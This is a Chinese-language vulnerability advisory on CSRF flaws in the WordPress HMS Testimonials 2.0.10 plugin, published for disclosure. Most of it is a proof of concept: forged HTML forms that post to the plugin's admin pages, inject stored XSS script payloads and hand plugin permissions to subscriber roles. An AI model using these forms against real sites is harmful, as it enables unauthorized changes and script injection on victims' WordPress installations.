发布日期:2013-08-09
更新日期:2013-08-10
受影响系统:
WordPress HMS Testimonials 2.0.10
描述:
--------------------------------------------------------------------------------
WordPress HMS Testimonials插件可在网页或帖子上显示客户的评价。
WordPress HMS Testimonials的所有表单都受到CSRF漏洞的影响,可导致远程攻击者执行未授权数据库操作。
<*来源:Jeff Kreitner
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof of Concept
========================
1. Testimonial
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnew">
<input type="hidden" value="<script>alert('xss')</script>">
<input type="hidden" value="<script>alert('xss')</script>">
<input type="hidden" value="08/08/2013">
<input type="hidden" value="<script>alert(String.fromCharCode(88,83,83))</script>">
<input type="hidden" value="<script>alert('xss')</script>">
<input type="hidden" value="1">
<input type="submit" value="Save Testimonial">
</form>
2. Group
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-addnewgroup&noheader=true">
<input type="hidden" value="New group">
<input type="submit" value="Save Group">
</form>
3.1. Settings - Default
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings">
<input type="hidden" value="1">
<input type="hidden" value='100'>
<input type="hidden" value='100'>
<input type="hidden" value='m/d/Y"><script>alert(3)</script>'>
<input type="hidden" value='div'>
<input type="hidden" value="">
<input type="hidden" value="">
<input type="submit" value="Save Settings (Default)">
</form>
3.2. Settings - Advanced
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-advanced">
<input type="hidden" value="subscriber">
<input type="hidden" value="subscriber">
<input type="hidden" value="9999">
<input type="hidden" value="subscriber">
<input type="hidden" value="1">
<input type="hidden" value="1">
<input type="hidden" value="editor">
<input type="hidden" value="author">
<input type="hidden" value="contributor">
<input type="hidden" value="subscriber">
<input type="submit" value="Save Settings (Advanced)">
</form>
3.3. Settings - Custom Fields
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-settings-fields">
<input type="hidden" value="xss">
<input type="hidden" value="textarea">
<input type="hidden" value="1">
<input type="submit" value="Save Settings (Custom Fields)">
</form>
3.4. Settings - Template
<form method="post" action="http://wordpress/wp-admin/admin.php?page=hms-testimonials-templates-new">
<input type="hidden" value="New template<script>alert('xss')</script>">
<input type="hidden" value="system_id">
<input type="submit" value="Settings Templates (Save)">
</form>
建议:
--------------------------------------------------------------------------------
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: